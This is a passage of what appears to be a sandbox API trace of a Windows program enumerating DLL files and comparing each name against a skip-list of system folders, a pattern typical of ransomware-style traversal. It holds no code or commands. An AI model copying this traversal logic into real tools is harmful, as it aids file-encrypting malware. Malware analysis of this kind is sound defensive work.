(HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.501] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-private-l1-1-0.dll", cchWideChar=33, lpMultiByteStr=0x1f8328, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-private-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 33 [0067.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c6f0 | out: hHeap=0x1e0000) returned 1 [0067.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x21fab8 [0067.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.501] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x4cc0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="api-ms-win-crt-process-l1-1-0.dll", cAlternateFileName="APFCAD~1.DLL")) returned 1 [0067.501] lstrcmpiW (lpString1="api-ms-win-crt-process-l1-1-0.dll", lpString2=".") returned 1 [0067.501] lstrcmpiW (lpString1="api-ms-win-crt-process-l1-1-0.dll", lpString2="..") returned 1 [0067.501] lstrcmpiW (lpString1="api-ms-win-crt-process-l1-1-0.dll", lpString2="...") returned 1 [0067.501] lstrcmpiW (lpString1="api-ms-win-crt-process-l1-1-0.dll", lpString2="windows") returned -1 [0067.501] lstrcmpiW (lpString1="api-ms-win-crt-process-l1-1-0.dll", lpString2="recovery") returned -1 [0067.501] lstrcmpiW (lpString1="api-ms-win-crt-process-l1-1-0.dll", lpString2="perflogs") returned -1 [0067.501] lstrcmpiW (lpString1="api-ms-win-crt-process-l1-1-0.dll", lpString2="documents and settings") returned -1 [0067.501] lstrcmpiW (lpString1="api-ms-win-crt-process-l1-1-0.dll", lpString2="$RECYCLE.BIN") returned 1 [0067.501] lstrcmpiW (lpString1="api-ms-win-crt-process-l1-1-0.dll", lpString2="system volume information") returned -1 [0067.501] lstrcmpiW (lpString1="api-ms-win-crt-process-l1-1-0.dll", lpString2="msocache") returned -1 [0067.502] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0067.502] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-process-l1-1-0.dll", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0067.502] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.502] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-process-l1-1-0.dll", cchWideChar=33, lpMultiByteStr=0x1f8328, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-process-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 33 [0067.502] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0067.502] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c068 [0067.502] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-process-l1-1-0.dll", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0067.502] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.502] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-process-l1-1-0.dll", cchWideChar=33, lpMultiByteStr=0x1f84e8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-process-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 33 [0067.502] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c068 | out: hHeap=0x1e0000) returned 1 [0067.502] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x1fc808 [0067.502] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21fab8 | out: hHeap=0x1e0000) returned 1 [0067.502] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.502] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.502] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x5ac0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="api-ms-win-crt-runtime-l1-1-0.dll", cAlternateFileName="AP8F34~1.DLL")) returned 1 [0067.502] lstrcmpiW (lpString1="api-ms-win-crt-runtime-l1-1-0.dll", lpString2=".") returned 1 [0067.502] lstrcmpiW (lpString1="api-ms-win-crt-runtime-l1-1-0.dll", lpString2="..") returned 1 [0067.502] lstrcmpiW (lpString1="api-ms-win-crt-runtime-l1-1-0.dll", lpString2="...") returned 1 [0067.502] lstrcmpiW (lpString1="api-ms-win-crt-runtime-l1-1-0.dll", lpString2="windows") returned -1 [0067.502] lstrcmpiW (lpString1="api-ms-win-crt-runtime-l1-1-0.dll", lpString2="recovery") returned -1 [0067.502] lstrcmpiW (lpString1="api-ms-win-crt-runtime-l1-1-0.dll", lpString2="perflogs") returned -1 [0067.502] lstrcmpiW (lpString1="api-ms-win-crt-runtime-l1-1-0.dll", lpString2="documents and settings") returned -1 [0067.502] lstrcmpiW (lpString1="api-ms-win-crt-runtime-l1-1-0.dll", lpString2="$RECYCLE.BIN") returned 1 [0067.502] lstrcmpiW (lpString1="api-ms-win-crt-runtime-l1-1-0.dll", lpString2="system volume information") returned -1 [0067.502] lstrcmpiW (lpString1="api-ms-win-crt-runtime-l1-1-0.dll", lpString2="msocache") returned -1 [0067.502] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c380 [0067.502] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-runtime-l1-1-0.dll", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0067.502] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.502] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-runtime-l1-1-0.dll", cchWideChar=33, lpMultiByteStr=0x1f8328, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-runtime-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 33 [0067.502] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c380 | out: hHeap=0x1e0000) returned 1 [0067.502] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c068 [0067.502] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-runtime-l1-1-0.dll", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0067.502] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.502] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-runtime-l1-1-0.dll", cchWideChar=33, lpMultiByteStr=0x1f84e8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-runtime-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 33 [0067.503] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c068 | out: hHeap=0x1e0000) returned 1 [0067.503] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x21fab8 [0067.503] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.503] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.503] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.503] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x60c0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="api-ms-win-crt-stdio-l1-1-0.dll", cAlternateFileName="APD1B7~1.DLL")) returned 1 [0067.503] lstrcmpiW (lpString1="api-ms-win-crt-stdio-l1-1-0.dll", lpString2=".") returned 1 [0067.503] lstrcmpiW (lpString1="api-ms-win-crt-stdio-l1-1-0.dll", lpString2="..") returned 1 [0067.503] lstrcmpiW (lpString1="api-ms-win-crt-stdio-l1-1-0.dll", lpString2="...") returned 1 [0067.503] lstrcmpiW (lpString1="api-ms-win-crt-stdio-l1-1-0.dll", lpString2="windows") returned -1 [0067.503] lstrcmpiW (lpString1="api-ms-win-crt-stdio-l1-1-0.dll", lpString2="recovery") returned -1 [0067.503] lstrcmpiW (lpString1="api-ms-win-crt-stdio-l1-1-0.dll", lpString2="perflogs") returned -1 [0067.503] lstrcmpiW (lpString1="api-ms-win-crt-stdio-l1-1-0.dll", lpString2="documents and settings") returned -1 [0067.503] lstrcmpiW (lpString1="api-ms-win-crt-stdio-l1-1-0.dll", lpString2="$RECYCLE.BIN") returned 1 [0067.503] lstrcmpiW (lpString1="api-ms-win-crt-stdio-l1-1-0.dll", lpString2="system volume information") returned -1 [0067.503] lstrcmpiW (lpString1="api-ms-win-crt-stdio-l1-1-0.dll", lpString2="msocache") returned -1 [0067.503] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0067.503] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-stdio-l1-1-0.dll", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0067.503] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0067.503] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-stdio-l1-1-0.dll", cchWideChar=31, lpMultiByteStr=0x241038, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-stdio-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 31 [0067.503] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0067.503] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0067.503] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-stdio-l1-1-0.dll", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0067.503] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0067.503] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-stdio-l1-1-0.dll", cchWideChar=31, lpMultiByteStr=0x240f20, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-stdio-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 31 [0067.503] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0067.503] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x1fc808 [0067.503] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21fab8 | out: hHeap=0x1e0000) returned 1 [0067.503] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0067.503] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0067.503] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x60c0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="api-ms-win-crt-string-l1-1-0.dll", cAlternateFileName="APBF0F~1.DLL")) returned 1 [0067.503] lstrcmpiW (lpString1="api-ms-win-crt-string-l1-1-0.dll", lpString2=".") returned 1 [0067.503] lstrcmpiW (lpString1="api-ms-win-crt-string-l1-1-0.dll", lpString2="..") returned 1 [0067.503] lstrcmpiW (lpString1="api-ms-win-crt-string-l1-1-0.dll", lpString2="...") returned 1 [0067.504] lstrcmpiW (lpString1="api-ms-win-crt-string-l1-1-0.dll", lpString2="windows") returned -1 [0067.504] lstrcmpiW (lpString1="api-ms-win-crt-string-l1-1-0.dll", lpString2="recovery") returned -1 [0067.504] lstrcmpiW (lpString1="api-ms-win-crt-string-l1-1-0.dll", lpString2="perflogs") returned -1 [0067.504] lstrcmpiW (lpString1="api-ms-win-crt-string-l1-1-0.dll", lpString2="documents and settings") returned -1 [0067.504] lstrcmpiW (lpString1="api-ms-win-crt-string-l1-1-0.dll", lpString2="$RECYCLE.BIN") returned 1 [0067.504] lstrcmpiW (lpString1="api-ms-win-crt-string-l1-1-0.dll", lpString2="system volume information") returned -1 [0067.504] lstrcmpiW (lpString1="api-ms-win-crt-string-l1-1-0.dll", lpString2="msocache") returned -1 [0067.504] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c380 [0067.504] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-string-l1-1-0.dll", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0067.504] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.504] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-string-l1-1-0.dll", cchWideChar=32, lpMultiByteStr=0x1f84e8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-string-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 32 [0067.504] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c380 | out: hHeap=0x1e0000) returned 1 [0067.504] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bda8 [0067.504] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-string-l1-1-0.dll", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0067.504] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.504] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-string-l1-1-0.dll", cchWideChar=32, lpMultiByteStr=0x1f8328, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-string-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 32 [0067.504] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bda8 | out: hHeap=0x1e0000) returned 1 [0067.504] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x21fab8 [0067.504] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.504] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.504] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.504] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x52c0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="api-ms-win-crt-time-l1-1-0.dll", cAlternateFileName="AP5E4C~1.DLL")) returned 1 [0067.504] lstrcmpiW (lpString1="api-ms-win-crt-time-l1-1-0.dll", lpString2=".") returned 1 [0067.504] lstrcmpiW (lpString1="api-ms-win-crt-time-l1-1-0.dll", lpString2="..") returned 1 [0067.504] lstrcmpiW (lpString1="api-ms-win-crt-time-l1-1-0.dll", lpString2="...") returned 1 [0067.504] lstrcmpiW (lpString1="api-ms-win-crt-time-l1-1-0.dll", lpString2="windows") returned -1 [0067.504] lstrcmpiW (lpString1="api-ms-win-crt-time-l1-1-0.dll", lpString2="recovery") returned -1 [0067.504] lstrcmpiW (lpString1="api-ms-win-crt-time-l1-1-0.dll", lpString2="perflogs") returned -1 [0067.504] lstrcmpiW (lpString1="api-ms-win-crt-time-l1-1-0.dll", lpString2="documents and settings") returned -1 [0067.504] lstrcmpiW (lpString1="api-ms-win-crt-time-l1-1-0.dll", lpString2="$RECYCLE.BIN") returned 1 [0067.504] lstrcmpiW (lpString1="api-ms-win-crt-time-l1-1-0.dll", lpString2="system volume information") returned -1 [0067.504] lstrcmpiW (lpString1="api-ms-win-crt-time-l1-1-0.dll", lpString2="msocache") returned -1 [0067.504] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0067.504] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-time-l1-1-0.dll", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0067.505] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0067.505] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-time-l1-1-0.dll", cchWideChar=30, lpMultiByteStr=0x2410d8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-time-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 30 [0067.505] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0067.505] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0067.505] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-time-l1-1-0.dll", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0067.505] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0067.505] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-time-l1-1-0.dll", cchWideChar=30, lpMultiByteStr=0x241178, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-time-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 30 [0067.505] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0067.505] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x1fc808 [0067.505] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21fab8 | out: hHeap=0x1e0000) returned 1 [0067.505] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0067.505] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0067.505] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x4ac0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="api-ms-win-crt-utility-l1-1-0.dll", cAlternateFileName="AP80F4~1.DLL")) returned 1 [0067.505] lstrcmpiW (lpString1="api-ms-win-crt-utility-l1-1-0.dll", lpString2=".") returned 1 [0067.505] lstrcmpiW (lpString1="api-ms-win-crt-utility-l1-1-0.dll", lpString2="..") returned 1 [0067.505] lstrcmpiW (lpString1="api-ms-win-crt-utility-l1-1-0.dll", lpString2="...") returned 1 [0067.505] lstrcmpiW (lpString1="api-ms-win-crt-utility-l1-1-0.dll", lpString2="windows") returned -1 [0067.505] lstrcmpiW (lpString1="api-ms-win-crt-utility-l1-1-0.dll", lpString2="recovery") returned -1 [0067.505] lstrcmpiW (lpString1="api-ms-win-crt-utility-l1-1-0.dll", lpString2="perflogs") returned -1 [0067.548] lstrcmpiW (lpString1="api-ms-win-crt-utility-l1-1-0.dll", lpString2="documents and settings") returned -1 [0067.548] lstrcmpiW (lpString1="api-ms-win-crt-utility-l1-1-0.dll", lpString2="$RECYCLE.BIN") returned 1 [0067.548] lstrcmpiW (lpString1="api-ms-win-crt-utility-l1-1-0.dll", lpString2="system volume information") returned -1 [0067.548] lstrcmpiW (lpString1="api-ms-win-crt-utility-l1-1-0.dll", lpString2="msocache") returned -1 [0067.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c068 [0067.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-utility-l1-1-0.dll", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0067.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-utility-l1-1-0.dll", cchWideChar=33, lpMultiByteStr=0x1f8328, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-utility-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 33 [0067.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c068 | out: hHeap=0x1e0000) returned 1 [0067.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c220 [0067.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-utility-l1-1-0.dll", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0067.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-utility-l1-1-0.dll", cchWideChar=33, lpMultiByteStr=0x1f84e8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-utility-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 33 [0067.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c220 | out: hHeap=0x1e0000) returned 1 [0067.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x21fab8 [0067.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.548] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xb979f700, ftLastWriteTime.dwHighDateTime=0x1d0d7a8, nFileSizeHigh=0x0, nFileSizeLow=0x27c40, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="ApiClient.dll", cAlternateFileName="APICLI~1.DLL")) returned 1 [0067.549] lstrcmpiW (lpString1="ApiClient.dll", lpString2=".") returned 1 [0067.549] lstrcmpiW (lpString1="ApiClient.dll", lpString2="..") returned 1 [0067.549] lstrcmpiW (lpString1="ApiClient.dll", lpString2="...") returned 1 [0067.549] lstrcmpiW (lpString1="ApiClient.dll", lpString2="windows") returned -1 [0067.549] lstrcmpiW (lpString1="ApiClient.dll", lpString2="recovery") returned -1 [0067.549] lstrcmpiW (lpString1="ApiClient.dll", lpString2="perflogs") returned -1 [0067.549] lstrcmpiW (lpString1="ApiClient.dll", lpString2="documents and settings") returned -1 [0067.549] lstrcmpiW (lpString1="ApiClient.dll", lpString2="$RECYCLE.BIN") returned 1 [0067.549] lstrcmpiW (lpString1="ApiClient.dll", lpString2="system volume information") returned -1 [0067.549] lstrcmpiW (lpString1="ApiClient.dll", lpString2="msocache") returned -1 [0067.549] RtlAllocateHeap 